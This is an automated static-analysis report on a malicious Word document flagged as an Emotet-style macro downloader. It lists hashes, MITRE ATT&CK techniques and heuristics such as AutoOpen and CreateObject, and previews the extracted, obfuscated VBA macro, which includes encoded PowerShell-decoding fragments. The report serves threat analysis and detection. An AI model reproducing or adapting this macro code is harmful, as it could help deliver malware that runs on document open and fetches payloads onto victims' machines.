Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f254f3d9d9c45f9…

MALICIOUS

Office (OLE)

230.5 KB Created: 2018-04-05 06:56:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 863f73729829a948df91180521b4d977 SHA-1: 429e767340a15ccadda94ee07685c9786ae966e9 SHA-256: 2f254f3d9d9c45f97a221faa02f071cba2beb92cc97848e09f6dc754a7585e95
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses CreateObject, indicating an attempt to execute code. The presence of a 'macros.bas' file and the ClamAV detection 'Doc.Malware.Emodldr-10025032-0' strongly suggest this document is designed to download and execute a secondary payload, likely through the VBA macro's capabilities. The specific payload or download URL is not directly discernible from the provided script excerpts due to obfuscation.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46728 bytes
SHA-256: 0fa8ddb0a690efd478f1f785e239cd9d7198ccb2deb653f0ce3b7af8dc0cc40c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 22 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NwnSZBq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UbqmEDHSjAq"
Sub KoNzWb(YcRCQ)
OpnLn = jRmdMc
         Cos (75763 / CDate(94943 - Sin(73193)))
         ssXkAK = (86768 / 27125)
mGDLw = 6779 / ZZpOU
tQJjY = BXjiX
         Cos (82589 / CDate(68091 - Sin(47614)))
         fLEwZu = (620 / 56153)
FnanDN = 14909 / NlzGb
liMtD = jUPitt
         Cos (27038 / CDate(71900 - Sin(33916)))
         Mtnjbl = (70141 / 28034)
WWzdz = 49157 / ErSON
wAwkX = tJzWGT
         Cos (48677 / CDate(11620 - Sin(36672)))
         sAwzZh = (11213 / 64116)
RFUpWT = 6883 / KwmjqN
End Sub
Function UKkjOWmc()
On Error Resume Next
uBzdmm = Khlah
         Cos (82355 / CDate(26780 - Sin(64552)))
         FKpFa = (84415 / 87712)
rcDtn = 9343 / iADsu
UvYFRa = hEVafj("zboANwAxADUAMwA4ADkAZQA5ADgANAA3ADUAYQA0ADcAOAAyAGIAMgBiADAAMQA4AGEAOQA0ADAAMCwC", 4 + 9934 - 9934, 74 + 9934 - 9934)
nKRznD = HjTvw
         Cos (36353 / CDate(93223 - Sin(47528)))
         jSCHp = (73214 / 20656)
NWcUvj = 75265 / mjSAX
cMOXz = SOGOl
         Cos (77423 / CDate(59679 - Sin(91575)))
         HNYwD = (16021 / 1242)
vYasiT = 81458 / pYuCo
rwZMmY = hEVafj("zDUANABkAGIANwA3ADAAMABiADEAOQA4ADYAOQAxADMAYgAxAGYAMgA4ADYAZgBiADUAZgBjADYAOQBlADMAZQBjAGQANwBkAGIANAA3ADMAZAA0ADMAZQBlAGYAYwA1AGE7CSDI", 2 + 9934 - 9934, 129 + 9934 - 9934)
sDfFI = bFRwm
         Cos (47936 / CDate(51856 - Sin(31253)))
         nmwbbT = (98216 / 43441)
jvQEv = 30343 / tWrUUR
AiQXZ = rpTmSL
         Cos (20903 / CDate(59938 - Sin(64445)))
         lbwTtL = (966 / 27471)
pZRcYz = 99265 / cBDOir
SsYrc = hEVafj("C,I2ADAAMwAzADAAYwBkADQAOQBkAGMAZgAyAGMANQA2AGQAYgBhAGIAZQBmADkAYQBjAGMAMABiADgANgA1AGMAYQBhAGEAMQAzAGQAMAAzADUAZABjADkAZQBjMqYQ", 4 + 9934 - 9934, 121 + 9934 - 9934)
PTKCMm = NLSRMG
         Cos (53092 / CDate(32747 - Sin(80324)))
         CrkBaM = (90436 / 75182)
didil = 4170 / KDZAwB
SkiTZ = EAXKZ
         Cos (9802 / CDate(99141 - Sin(85810)))
         mPzYu = (78155 / 58645)
CuVOSC = 59411 / MHUpAN
dEDiwksrWh = hEVafj("vCkmADMANABlAGMAZgA1AGUAMgAzADEANwBjADQAMgBkA7kFJd", 4 + 9934 - 9934, 42 + 9934 - 9934)
wWoKY = vRnSf
         Cos (73810 / CDate(59866 - Sin(44953)))
         haoujZ = (6577 / 87630)
zsRMzf = 6785 / ZIzBG
EjoKzz = MKVzU
         Cos (12561 / CDate(46621 - Sin(61852)))
         QzntS = (57676 / 56478)
wkYol = 57540 / ndvzkl
wsSUORK = hEVafj("F7kA1ADkAYwBjADcAYQAzADcAYwBmAGQAZQBjADcANAAwAGIAZgA pm1", 4 + 9934 - 9934, 49 + 9934 - 9934)
ZLETJ = fdraQI
         Cos (25246 / CDate(16790 - Sin(97113)))
         MaDYMO = (47844 / 65534)
hlKqLZ = 92619 / Pacpw
MlztEB = XXTfY
         Cos (16319 / CDate(27789 - Sin(19205)))
         JJdIE = (95066 / 35804)
nGjqm = 57659 / iGKiMP
NrVAKXqXbmA = hEVafj("kJCEs.MARshAl]::PTrTOsTrIngbSTR([RUNtIMe.INtEROpserVIcEs.MarshAL]::securEStRinGtObsTR( $('76492d1116743f0423413b16050a5345MgB8AHgAdgBHAHQANgB4AHIANwAyAFUANgBzAEsAbgB2AC8ANAA2ADQAaQVm13", 3 + 9934 - 9934, 178 + 9934 - 9934)
IvzVvZ = jMEOBm
         Cos (61123 / CDate(64686 - Sin(7329)))
         PTzGzU = (28434 / 72622)
sASzjz = 15571 / AiKiB
iizlBM = dpsQJ
         Cos (25498 / CDate(25182 - Sin(12923)))
         XkbLc = (65566 / 11534)
RQlHG = 64622 / jPzdt
ONshpwwPS = hEVafj("hQA0ADEAMABlAGUANgA4ADAAYgAyAGEAMgA5AGUAOQBkADQAOAA1ADQAYQAyADAAYQA4AGUANQA0AGYAMQAyAGQAYwBhADAANAB,p8azj", 2 + 9934 - 9934, 98 + 9934 - 9934)
tFwmwa = tCpFc
         Cos (49718 / CDate(69333 - Sin(96955)))
         XXAcu = (38472 / 70944)
vWHUjt = 25538 / NPdfcY
rQStB = mRmDM
         Cos (61664 / CDate(99353 - Sin(20776)))
         zUSpBH = (710 / 42022)
BjzaG = 41359 / aQwHsz
wjUYsXhZf = hEVafj("rZZABlADAAYwA2AGQAZABhADgAZgAwADYANQBjADMAMwAwAGQANQA2ADkANQBiAGQANQA4AwIa5", 4 + 9934 - 9934, 68 + 9934 - 9934)
pwjbzh = jUAsaP
         Cos (78886 / CDate(99620 - Sin(71728)))
         ruLsS
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.